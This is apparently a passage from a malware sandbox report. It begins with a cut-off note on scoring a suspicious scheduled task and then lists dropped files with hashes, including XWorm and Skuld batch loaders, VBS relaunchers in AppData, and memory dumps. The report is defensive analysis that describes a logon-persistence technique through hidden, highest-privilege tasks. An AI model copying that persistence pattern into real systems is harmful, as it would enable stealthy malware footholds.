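Against the task registered in this run the action would score script-as-executable, user-writable-path, runlevel-highest, hidden and at-logon at once. Some vendor updaters in the root task path legitimately run from ProgramData with a logon trigger and will show two flags, so treat the threshold as a triage knob, not a verdict, and review the flagged script files themselves (here, the .vbs simply relaunches the .bat loader).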
MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    8ba8fc1034d449222856ea8fa2531e28

    SHA1

    7570fe1788e57484c5138b6cead052fbc3366f3e

    SHA256

    2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

    SHA512

    7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

    Filesize

    152B

    MD5

    0c705388d79c00418e5c1751159353e3

    SHA1

    aaeafebce5483626ef82813d286511c1f353f861

    SHA256

    697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d

    SHA512

    c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

    Filesize

    152B

    MD5

    0d84d1490aa9f725b68407eab8f0030e

    SHA1

    83964574467b7422e160af34ef024d1821d6d1c3

    SHA256

    40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e

    SHA512

    f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

    Filesize

    5KB

    MD5

    83e506b90ab01134a49d1c39f81435a4

    SHA1

    313ab67404fef224ba69c3690819f6ec838cfdb7

    SHA256

    e934697cff1c479a14fefb6b7d30c45767c57b76f59e8c82fd20dfb176062a75

    SHA512

    bd7b09b8d7463ab1b44d6e7315ada34a5794a54709ad8912f1e840b2023f54e95a13c21bec73662d5eaf9273a5c8ab9abe98a5e8a291e37b420eef6d3deb2e0d

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

    Filesize

    6KB

    MD5

    3abf936b2a2f2edd91e713b4a5d33b97

    SHA1

    bfadcecc9566777179ea62a934b216abd4e66b30

    SHA256

    ee183117529cc34604c75321e615018e52515f8ec77a8e67aa7d5a79e82d70de

    SHA512

    72d8437e336c7d2cb116deb59bebef5d12a92f40dd4bf40b21b8cb62902e372d92e24d3fdee065a6a56566c77ccc9e467374691474ba2f7a6a7cea2774e022ce

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

    Filesize

    16B

    MD5

    46295cac801e5d4857d09837238a6394

    SHA1

    44e0fa1b517dbf802b18faf0785eeea6ac51594b

    SHA256

    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

    SHA512

    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

    Filesize

    16B

    MD5

    206702161f94c5cd39fadd03f4014d98

    SHA1

    bd8bfc144fb5326d21bd1531523d9fb50e1b600a

    SHA256

    1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

    SHA512

    0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

    Filesize

    8KB

    MD5

    f83f1a3f4a7906ed93685e99de3e48e5

    SHA1

    35ed7e2a0070b7e6d0e3bef6b9f438e3766af9ff

    SHA256

    8e0016cbbe024c2a41e839ccf172cf494ba734f49c726557a219f7d7a269c412

                                                SHA512

                                                74459300b7754b229bff4112216ee76a00853cbc4720ec3eb2806f6ccac58820edfda56949536296707ad0eb7a52cb22cf3b5d8fd07eefedd3a4787830e6a354

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                8KB

                                                MD5

                                                a8d9fa260268d0aeef5c604ce35c9c5a

                                                SHA1

                                                2c6e5216c65c9364a36e21b5b7fc8db5ff18fa5c

                                                SHA256

                                                138d72817b6d39a6252ff82a6372f38c601cd48fa2b1cbafdfb41fbecc450275

                                                SHA512

                                                185ce2947efa77a78ce0ed9523ec7cc6e86f121c96e5e857a4d7cc9c1caa5f99ceb6a7ba338e76c1e749077aadc0cd93d760b6365693abcffa09fe2f5853417e

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                Filesize

                                                18KB

                                                MD5

                                                1314d6b12ac057e167c1734363b8d32d

                                                SHA1

                                                f54e69b17fb65b8da661c6404eb48ec217639270

                                                SHA256

                                                6fdc5fca629f98db66a207b28ccd11df1d8698539e273082550b7f9eab5e3347

                                                SHA512

                                                0b87e2ad7adc9bc31cf58b4f705f329250185799d99a2ba0d5a83f623dd5f00eb51e38518a9d6ae16868aadc334c69c7d34eacc4a488dfc6303372f5331458ca

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                Filesize

                                                18KB

                                                MD5

                                                2a1fdb89cf408566ad184e42e71bb123

                                                SHA1

                                                2f834624e56b5082a6a25a88e3d915cbfbc3755c

                                                SHA256

                                                a7f4944b7fa7efb91706f53d6694c619e5f165402b59630c4471513c8e1d515d

                                                SHA512

                                                0cfd3a5f047f855186fb03cab9f1ae7595225a1568061a03f14880e5093b82dda05729af4289b6572c833a192bf512fcf6d3901f066666ea3fda248d379ca0de

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                21KB

                                                MD5

                                                a5c46224f3aa8c927796932b28d119b4

                                                SHA1

                                                07988cd548792010638e409431cfd55fbd16ce72

                                                SHA256

                                                2e9554fcb56fa5bbf482a3974ff32a7c7d55ea0bb619bcb1a132d5cacc5f88e8

                                                SHA512

                                                8a51e69ebfba35973671060be512dc0f4018d871626168379d191366a4ccc878514209914fa343d0fe92052a78b53ee9333d948c647eaee3ef4e2e5d75c62b63

                                              • C:\Users\Admin\AppData\Local\Temp\Log.tmp

                                                Filesize

                                                62B

                                                MD5

                                                48a4d8d2f59528ab75380faa39981ca7

                                                SHA1

                                                aaba2693e7c957bcdf02b95c96348f57dfde0da6

                                                SHA256

                                                7dc95e5d061697cc48611533328a01f7a69981ff6bd4c86581c98df867a558a2

                                                SHA512

                                                ae8e0f246aab54ebad63bde7dd3594673f92ecd560d047e68a01a731fcb4efbc5625ea36b6b4f0ed90647cae9ed4c8744df0fdf6c4a2c28a467382f29a71616e

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat

                                                Filesize

                                                422B

                                                MD5

                                                28194258aa09be52f6767e389194ef1d

                                                SHA1

                                                d7ede25b3ebd83a084cff22ae1ad4f7612a99eb0

                                                SHA256

                                                f02fe5951dc207722da607c087c4222067df5ca126687541f3736130e166efbc

                                                SHA512

                                                eec2fc47c9fa340c17a3ff5fb5ffe0abe3ffe1966da131435ca9bcd9b100f2cacf60039969ee4f8e8ea0340d74b8772f9205e57b9a2c83bfdd2ea49c7e5b741c

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat

                                                Filesize

                                                12.8MB

                                                MD5

                                                189e42d1a681c3b07c7f92d247c214b0

                                                SHA1

                                                8b96bb15ccb0d433b07b5eadeb5e2a05157d5d99

                                                SHA256

                                                ba7e850b945f72b85cd39d8fc5f6571962ccdfbba5fbda12fc2794b241dce9fd

                                                SHA512

                                                d2acb262d4c1b5fcd63950b3c6928701d6a3314d63e63a243e2df8908b746d7649bf8d3b2b6dd0dc6f39c483bead6516260a7d1e201685eef112134833a95e24

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat

                                                Filesize

                                                74B

                                                MD5

                                                b3be17a14609d812602af67da8b7acc2

                                                SHA1

                                                e1fcc3e3989ee6846694eba252622a336ce63795

                                                SHA256

                                                f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81

                                                SHA512

                                                780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat

                                                Filesize

                                                340B

                                                MD5

                                                6943c2eb7e78b8b8cb8171b940de20f2

                                                SHA1

                                                e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a

                                                SHA256

                                                eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095

                                                SHA512

                                                1d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b

                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat

                                                Filesize

                                                155KB

                                                MD5

                                                45f7e10fb33d48463a55c89d40d4824a

                                                SHA1

                                                b95ef1efdb8f79c468cd4cdcd85c8dd54087d9e2

                                                SHA256

                                                7f37dbc61973ca542c89303b1df4f33ccc5ac442a16f497b115236bb58664d2f

                                                SHA512

                                                43ad9acb9e43063a2d83045a24ff24ea7e211c05cdfc2b202f5cf1bd4e73ee9a134802c9aec22e7b941d4eec905055426b313ea30c7a55a6bb2ca467e77325ad

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nej3pzew.lc0.ps1

                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                              • C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs

                                                Filesize

                                                115B

                                                MD5

                                                b2f9e9363d5230b504c727b66c8f899a

                                                SHA1

                                                ca002f96780145e6bdf6efea6d08a4f3997f4769

                                                SHA256

                                                658a5212102e7582c463120ff34a0873c21dbae015a2e048e36ecdbf9fb4137b

                                                SHA512

                                                04a8c7cc5d73ca21e96de1f88a02a6a4a5a71d74b0b5a47ad376bf0b3dea27ced75036819d0fea8994331fe95150eaff9c6c1fbb8199e8d336b6b378983d4c28

                                              • C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs

                                                Filesize

                                                115B

                                                MD5

                                                d58fbbe00f10ac2f1c10caeadc86cd35

                                                SHA1

                                                a4c82ac805ab54686f8f14a1f7b28eb6c2675b9f

                                                SHA256

                                                31ba666c8effdfb73401edb4edec3ffad73f847dfab9b2ea32b1476127ffb6f9

                                                SHA512

                                                06ba02dd9bc8bd8cbd09ae073257fd081f6e5b3e30524b73c868a10e78ac50dec70d0ee75c5d0fae7843ec12ebe6aad14a5fb001e0c1c6463da26ec53d325ce9

                                              • memory/1792-151-0x0000000007380000-0x0000000007391000-memory.dmp

                                                Filesize

                                                68KB

                                              • memory/1792-139-0x0000000072620000-0x000000007266C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/1792-148-0x0000000007050000-0x00000000070F4000-memory.dmp

                                                Filesize

                                                656KB

                                              • memory/1956-39-0x0000000002780000-0x00000000027B6000-memory.dmp

                                                Filesize

                                                216KB

                                              • memory/1956-63-0x0000000005F10000-0x0000000005F56000-memory.dmp

                                                Filesize

                                                280KB

                                              • memory/1956-62-0x0000000005FF0000-0x000000000603C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/1956-61-0x0000000005B30000-0x0000000005B4E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/1956-52-0x0000000005750000-0x0000000005AA7000-memory.dmp

                                                Filesize

                                                3.3MB

                                              • memory/1956-124-0x0000000004A70000-0x0000000004A78000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/1956-40-0x0000000005120000-0x000000000574A000-memory.dmp

                                                Filesize

                                                6.2MB

                                              • memory/1956-126-0x0000000031C80000-0x0000000032620000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/3148-185-0x0000000007FC0000-0x0000000008052000-memory.dmp

                                                Filesize

                                                584KB

                                              • memory/3148-186-0x0000000008090000-0x000000000809A000-memory.dmp

                                                Filesize

                                                40KB

                                              • memory/3148-137-0x0000000007D90000-0x0000000007DA0000-memory.dmp

                                                Filesize

                                                64KB

                                              • memory/3148-138-0x0000000007E40000-0x0000000007EDC000-memory.dmp

                                                Filesize

                                                624KB

                                              • memory/4128-41-0x0000000005AA0000-0x0000000005AC2000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/4128-68-0x00000000088D0000-0x0000000008E76000-memory.dmp

                                                Filesize

                                                5.6MB

                                              • memory/4128-42-0x0000000005C40000-0x0000000005CA6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/4128-43-0x0000000005CB0000-0x0000000005D16000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/4128-65-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

                                                Filesize

                                                104KB

                                              • memory/4128-64-0x0000000008250000-0x00000000088CA000-memory.dmp

                                                Filesize

                                                6.5MB

                                              • memory/4128-66-0x0000000007C20000-0x0000000007C28000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/4128-67-0x0000000007C50000-0x0000000007C70000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/4656-89-0x0000000007AE0000-0x0000000007B84000-memory.dmp

                                                Filesize

                                                656KB

                                              • memory/4656-79-0x0000000072620000-0x000000007266C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/4656-78-0x0000000006EA0000-0x0000000006ED4000-memory.dmp

                                                Filesize

                                                208KB

                                              • memory/4656-88-0x0000000007AC0000-0x0000000007ADE000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/4656-92-0x0000000007E30000-0x0000000007E41000-memory.dmp

                                                Filesize

                                                68KB

                                              • memory/4656-90-0x0000000007C90000-0x0000000007C9A000-memory.dmp

                                                Filesize

                                                40KB

                                              • memory/4656-91-0x0000000007EA0000-0x0000000007F36000-memory.dmp

                                                Filesize

                                                600KB